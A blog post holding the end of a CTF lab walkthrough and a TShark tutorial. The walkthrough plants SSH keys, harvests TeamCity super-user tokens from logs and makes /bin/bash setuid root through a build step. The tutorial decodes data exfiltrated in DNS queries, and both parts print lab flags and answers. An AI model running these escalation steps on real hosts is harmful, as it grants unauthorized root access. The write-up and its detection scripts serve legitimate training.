    HTTP request sent, awaiting response... 200 OK
    Length: 580 [application/octet-stream]
    Saving to: ‘authorized_keys.1’
    
    authorized_keys                 100%[===========================================================>]     580  --.-KB/s    in 0s      
    
    2021-05-10 14:16:11 (76.5 MB/s) - ‘authorized_keys.1’ saved [580/580]
    
    sys-internal@vulnnet-internal:~/.ssh$ ls
    authorized_keys  authorized_keys
    sys-internal@vulnnet-internal:~/.ssh$ 
    

     

     


     

     

    Now SSH in as sys-internal from our machine with the private key.

     


     

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ssh -i id_rsa sys-internal@10.10.155.145
    Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch
    
    541 packages can be updated.
    342 updates are security updates.
    
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    Last login: Mon May 10 13:57:55 2021 from 10.8.61.234
    sys-internal@vulnnet-internal:~$ whoami
    sys-internal
    sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
    sys-internal@vulnnet-internal:~$ ls
    Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
    sys-internal@vulnnet-internal:~$ 
    

     

     


     

    Privilege Escalation

     

    Manual enumeration turns up a directory named TeamCity at the filesystem root. Its readme confirms it is a JetBrains TeamCity install, and the Tomcat-running.txt marker suggests its web server is up.

     

     



    sys-internal@vulnnet-internal:~$ cd /TeamCity
    sys-internal@vulnnet-internal:/TeamCity$ ls
    bin          buildAgent  devPackage  licenses  service.properties   temp                webapps
    BUILD_85899  conf        lib         logs      TeamCity-readme.txt  Tomcat-running.txt  work
    sys-internal@vulnnet-internal:/TeamCity$ cat  TeamCity-readme.txt
    This is the JetBrains TeamCity home directory.
    
    For evaluation purposes, we recommend running both server and agent. If you need to run only the TeamCity server, execute:
    * On Windows: `.\bin\teamcity-server.bat start`
    * On Linux and macOS: `./bin/teamcity-server.sh start`
    sys-internal@vulnnet-internal:/TeamCity$
    sys-internal@vulnnet-internal:/TeamCity$
    
    
    

     

     

     

     


     

     

    sys-internal@vulnnet-internal:/TeamCity$
    sys-internal@vulnnet-internal:/TeamCity$ ss | grep 8111
    tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:58689                                 [::ffff:127.0.0.1]:8111                             
    tcp  CLOSE-WAIT 1       0                          [::ffff:127.0.0.1]:39595                                 [::ffff:127.0.0.1]:8111                             
    tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:8111                                  [::ffff:127.0.0.1]:58689                            
    sys-internal@vulnnet-internal:/TeamCity$ 
    

     

     

     

    ss shows connections to 127.0.0.1:8111, so TeamCity's web interface is bound to loopback only and was not visible to nmap (ss -tlnp | grep 8111 confirms the listener). An SSH local port forward makes it reachable on port 8111 of our own machine.

     

     

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ssh sys-internal@10.10.155.145 -i id_rsa -L 8111:localhost:8111
    Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch
    
    541 packages can be updated.
    342 updates are security updates.
    
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    Last login: Mon May 10 14:20:06 2021 from 10.8.61.234
    sys-internal@vulnnet-internal:~$ 
    
    
    

     

     


     

     

    Browsing to localhost:8111 now reaches the TeamCity login page, which shows the server version; the BUILD_85899 directory in /TeamCity is the corresponding build number.



     


     

     

     

    Clicking "Login as Super User" asks for an authentication token. Back in the SSH session, I grep the TeamCity directory for it.

     


    sys-internal@vulnnet-internal:/TeamCity$ grep -r "authentication token"
    grep: temp/jna-3506402: Permission denied
    grep: webapps/ROOT/plugins/TeamCity.SharedResources: Permission denied
    grep: webapps/ROOT/plugins/data-dir-browse: Permission denied
    grep: webapps/ROOT/plugins/coverage: Permission denied
    
    logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
    logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
    logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
    logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
    
    sys-internal@vulnnet-internal:/TeamCity$ 
    
    authentication token 8070510537629599387

    I found several super user authentication tokens in logs/catalina.out, which is readable by the sys-internal user. Using one of these (empty username, token as the password, as the log line says), I can log in. Poking around, I find I can create a new build.

    Creating a new build, I can add a build step that executes Python. My first thought was to throw in a Python reverse shell, but this did not work. So, don't worry, we have a second solution.

    Since TeamCity is running as root, whatever process we can get it to spawn will run with root permissions, so we immediately started to poke around for console pages, a terminal, or anything else that could be used to run system commands.

    After a while we figured out that you can create a project and then a build configuration, skipping the question about a “New VCS Root”.

    After creating the build configuration, choose “Build Steps” on the left menu to add a build step.

    Choose the runner type “Python” and set the command to “Custom script”.

    Then, in the custom script section, we write a simple script.

    I can set the SUID bit on a binary to elevate my privileges. Since bash is the easiest, I chose to do that.

    import os

    # Executed by the TeamCity agent, which runs as root, so this makes /bin/bash setuid/setgid root
    os.system("chmod +s /bin/bash")

    After saving this build and running it, I go back to my SSH session.

    Here I see that the permissions of /bin/bash have changed.

    sys-internal@vulnnet-internal:/TeamCity$ 
    sys-internal@vulnnet-internal:/TeamCity$ cd 
    sys-internal@vulnnet-internal:~$ ls /bin/bash
    /bin/bash
    sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
    sys-internal@vulnnet-internal:~$ ls /bin/bash
    /bin/bash
    sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
    sys-internal@vulnnet-internal:~$ 
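    The build step above turned /bin/bash into a setuid-root binary and the walkthrough then checks the bit by hand. The following Python script is an added example for this post (not code from the original walkthrough or from TeamCity): it walks a directory tree, reports every regular file with the setuid or setgid bit set that is not on a known-good allow-list, and builds a throwaway tree so it can be run without root. The allow-list contents and the demo tree are constructed for illustration; on a real host the baseline would be generated from a trusted install and the scan pointed at "/".

```python
"""Audit setuid/setgid files against a known-good baseline.

Added example for this walkthrough, not code from the original post: the
build step above ran `chmod +s /bin/bash` as root. A defender can catch the
same change by walking the filesystem and reporting every file whose setuid
or setgid bit is set but which is not on an allow-list taken from a trusted
install.
"""
import os
import stat
import tempfile

# Constructed allow-list for illustration only. A real baseline is generated
# on a freshly built, trusted host (e.g. `find / -perm /6000 -type f`) and
# kept under configuration management so drift can be diffed.
BASELINE_SETID = frozenset({
    "/bin/su",
    "/bin/mount",
    "/bin/umount",
    "/usr/bin/passwd",
    "/usr/bin/sudo",
})


def is_setid(mode):
    """True when `mode` describes a regular file with setuid or setgid set."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_unexpected_setid(root, baseline=BASELINE_SETID, prefix_strip=""):
    """Walk `root`; return sorted setuid/setgid files that are not in `baseline`.

    `prefix_strip` maps a scan directory (a mounted image, or the throwaway
    tree built below) back onto the absolute paths the baseline uses, so
    "/tmp/x/bin/bash" is compared as "/bin/bash".
    """
    unexpected = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks out of the tree
            except OSError:
                continue  # removed mid-walk or unreadable; skip, do not crash
            if not is_setid(st.st_mode):
                continue
            if prefix_strip and path.startswith(prefix_strip):
                logical = path[len(prefix_strip):]
            else:
                logical = path
            if logical not in baseline:
                unexpected.append(logical)
    return sorted(unexpected)


def build_demo_tree():
    """Construct a throwaway tree with a fake /bin for the demo.

    'bash' gets setuid+setgid (what `chmod +s` does), 'su' is setuid and on
    the baseline, 'ls' has no special bits. Returns the tree's root path.
    """
    root = tempfile.mkdtemp(prefix="setid-audit-")
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    for name, mode in (("bash", 0o6755), ("su", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # placeholder content; only the mode matters
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for hit in find_unexpected_setid(demo, prefix_strip=demo):
        print("unexpected setuid/setgid file:", hit)
    # On a live host, run find_unexpected_setid("/") from a cron job or an
    # EDR rule and alert on any output; the baseline diff is the signal.
```

    The demo tree reports only /bin/bash: /bin/su is setuid too but is on the baseline, which is the point of diffing against a trusted list instead of alerting on every setuid file.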

    I can now elevate my privileges to root with the setuid bash, using -p so that bash keeps the effective UID instead of dropping it:

    As root, I can read root.txt:

    sys-internal@vulnnet-internal:~$ 
    sys-internal@vulnnet-internal:~$ cd /bin/bash
    -bash: cd: /bin/bash: Not a directory
    sys-internal@vulnnet-internal:~$ 
    sys-internal@vulnnet-internal:~$ /bin/bash -p
    bash-4.4# whoami
    root
    bash-4.4# #kumaratuljaiswal.in
    bash-4.4# 
    bash-4.4# cat /root/root.txt
    THM{e8996faea46df09dba5676dd271c60bd}
    bash-4.4# 
    
    Finally we won!! Thanks for supporting :-)

    Disclaimer

    This was written for educational purposes and pentesting only.
    The author will not be responsible for any damage!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal!

    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about ethical hacking, security, penetration testing and malware analysis. Hacking tutorials are against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

    All tutorials and videos have been made using our own routers, servers, websites and other resources; they do not contain any illegal activity. We do not promote, encourage, support or incite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from becoming a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

  • Learn how to use TShark to accelerate your pcap analysis!

    Tshark

    Bored with trying to extract packets by hand? Need to get info from a pcap file that doesn't extract easily from Wireshark? Are GUIs for losers but now you realized you can't open Wireshark? Well my friend, TShark is the solution to all your problems.

    Installation


    Before beginning, we need to make sure we have tshark installed on our host - If you are using the AttackBox you can skip this, as it already has tshark installed.



    Generally, tshark is installed with Wireshark. But let's verify it's installed anyway. Run the command below to determine if it's installed or not.



    apt list tshark



    In my output above, we can see that it is installed. If it's not installed, sudo apt install tshark will do the trick.

    The tshark program is also available in a Windows installation as tshark.exe in the Wireshark install directory.

    Try running tshark -h to get the help output to make sure we can access the program properly. 

    Download Capture File :- Click Here

    This task uses the dns.cap capture file on the Wireshark SampleCaptures wiki page.

    To read a file with TShark, we will use the -r switch. This will display a summary line of each packet similar to tcpdump output and is useful to identify high-level information about the capture.



    tshark -r dns.cap



    When paired with wc -l, we can quickly identify how many packets are in a capture.


    tshark -r dns.cap | wc -l




    We can utilize Wireshark display filters (which are DIFFERENT than bpf syntax) to narrow down what packets are displayed. If we're interested in DNS A records only, we can use the dns.qry.type == 1 display filter to narrow down our packets. Display filters are added using the -Y switch. Our command below will show all of the A records in our capture, including responses.



    tshark -r dns.cap -Y "dns.qry.type == 1"





    The power of TShark comes with combining traditional Wireshark filters with extraction. We can extract specific field values directly from the pcap, allowing us to have only the interesting fields returned. One way to extract data is using the -T fields and -e [fieldname] switches. To extract the A records in the pcap, we would use -T fields -e dns.qry.name at the end of our previous tshark command. This makes our command the one below:



    tshark -r dns.cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name

    NOTE: An easy way to identify field names in Wireshark is to navigate to the Packet Details in the capture, highlight the interesting field, then view the bottom left corner.

    1) How many packets are in the dns.cap file?


    Command :- tshark -r cap | wc -l

    Ans:- 38

    2) How many A records are in the capture? (Including responses)

    Command :- tshark -r cap -Y "dns.qry.type == 1"

    Ans:- 6

    3) Which A record was present the most?

    Command :- tshark -r cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name

    Ans:- GRIMM.utelsystems.local

    File :- the pcap linked above

    Can you find it?

    Use the attached file to analyze in Wireshark and TShark to find the exfiltrated data. As you identify suspicious items in Wireshark, pivot to TShark to extract relevant information.



    Remember, we can filter out irrelevant packets with the -Y switch using display filters.

    1) How many packets are in this capture?


    Command :-  tshark -r pcap | wc -l

    Ans :- 125

    2) How many DNS queries are in this pcap? (Not responses!)


    Command :-  tshark -r pcap -Y "dns.flags.response == 0" | wc -l

    Ans :- 56

    3) What is the DNS transaction ID of the suspicious queries (in hex)?

    Command :- tshark -r pcap -Y "dns.qry.type == 1"

    Ans :- 0xbeef

    4) What is the string extracted from the DNS queries?

    Command :-  tshark -r pcap -Y "dns.qry.type == 1" | grep -v 'unreachable' | cut -d 'A' -f 2 | cut -d '.' -f 1


    MMZZWWGGCCZZ3333OORRUUDDCC442277NNFFZZVV6655BQQBOOV

    VTTWWQQXX33XXNNFF22GGQQMMDDVVGG55PPXXII4433IIGGRRZZ

    Removing the duplicated characters (e.g. MM -> M, 3333 -> 33) leaves us with:

    Ans :- MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5

    5) What is the flag?

    Command :- echo "MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5" | base32 -d

    Ans :- flag{th1s_is_t0ugh_with0u7_tsh4rk!}
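    Questions 3 to 5 above are done by hand: filter on the suspicious transaction ID, strip the duplicated query lines, join the labels and base32-decode. The Python script below is an added example (not part of the original post or of TShark) that does the same end to end over the tab-separated text that tshark prints for `-T fields -e dns.id -e dns.flags.response -e dns.qry.name`. The sample lines and the .exfil.example domain are constructed for the demo; they reuse the base32 chunks from the answer above so the decoded output can be compared with it.

```python
"""Reassemble and decode data exfiltrated in DNS query names.

Added example, not part of the original post. It automates the manual
steps of questions 3-5: keep only queries (not responses) carrying the
suspicious transaction ID, drop the duplicated copy of each query, join the
first label of each query name, and base32-decode the result.

Input is the tab-separated text that this command prints:
    tshark -r file.pcap -T fields -e dns.id -e dns.flags.response -e dns.qry.name
"""
import base64

# Constructed sample output (not from the challenge pcap). The three 0xbeef
# queries carry the base32 chunks from the answer above, each query appears
# twice (the duplication the post had to strip), and a normal lookup plus
# two responses are mixed in so the filter has something to reject.
SAMPLE_TSHARK_FIELDS = """\
0x1a2b\t0\twww.example.com
0xbeef\t0\tMZWGCZ33ORUDC427.exfil.example
0xbeef\t0\tMZWGCZ33ORUDC427.exfil.example
0xbeef\t1\tMZWGCZ33ORUDC427.exfil.example
0xbeef\t0\tNFZV65BQOVTWQX3X.exfil.example
0xbeef\t0\tNFZV65BQOVTWQX3X.exfil.example
0x1a2b\t1\twww.example.com
0xbeef\t0\tNF2GQMDVG5PXI43IGRZGWIL5.exfil.example
0xbeef\t0\tNF2GQMDVG5PXI43IGRZGWIL5.exfil.example
"""


def parse_fields(text):
    """Turn `tshark -T fields` lines into (dns_id, is_response, qry_name) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        dns_id, response_flag, name = line.split("\t")
        rows.append((int(dns_id, 16), response_flag == "1", name))
    return rows


def collect_chunks(rows, suspicious_id=0xBEEF):
    """Return the ordered first labels of suspicious queries, duplicates collapsed.

    Only queries are used: a response repeats the question section, so
    counting it would double every chunk. Consecutive identical names are
    treated as one query (retransmissions or a double-captured packet).
    """
    chunks = []
    for dns_id, is_response, name in rows:
        if is_response or dns_id != suspicious_id:
            continue
        label = name.split(".")[0]  # same as the post's `cut -d '.' -f 1`
        if chunks and chunks[-1] == label:
            continue
        chunks.append(label)
    return chunks


def decode_base32_chunks(chunks):
    """Join the chunks and base32-decode them, restoring stripped '=' padding.

    DNS labels cannot carry '=', so exfil tools drop the padding; base32
    needs the text length to be a multiple of 8, so it is put back here.
    """
    joined = "".join(chunks).upper()
    joined += "=" * (-len(joined) % 8)
    return base64.b32decode(joined)


def recover_exfil(text, suspicious_id=0xBEEF):
    """End-to-end: tshark field output -> decoded bytes."""
    return decode_base32_chunks(collect_chunks(parse_fields(text), suspicious_id))


if __name__ == "__main__":
    print(recover_exfil(SAMPLE_TSHARK_FIELDS).decode("ascii", "replace"))
```

    Feed it real output with `tshark -r file.pcap -T fields -e dns.id -e dns.flags.response -e dns.qry.name > fields.txt` and call recover_exfil on the file contents; the constant transaction ID is the detection handle here, since a normal resolver randomises it per query.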

    Optional for this post (Wireshark): put http.request.method == "POST" in the Wireshark display filter to show only POST requests. Click on the packet, then expand the Hypertext Transfer Protocol field; the POST data will be right there at the top.



    - Hacking Truth by Kumar Atul Jaiswal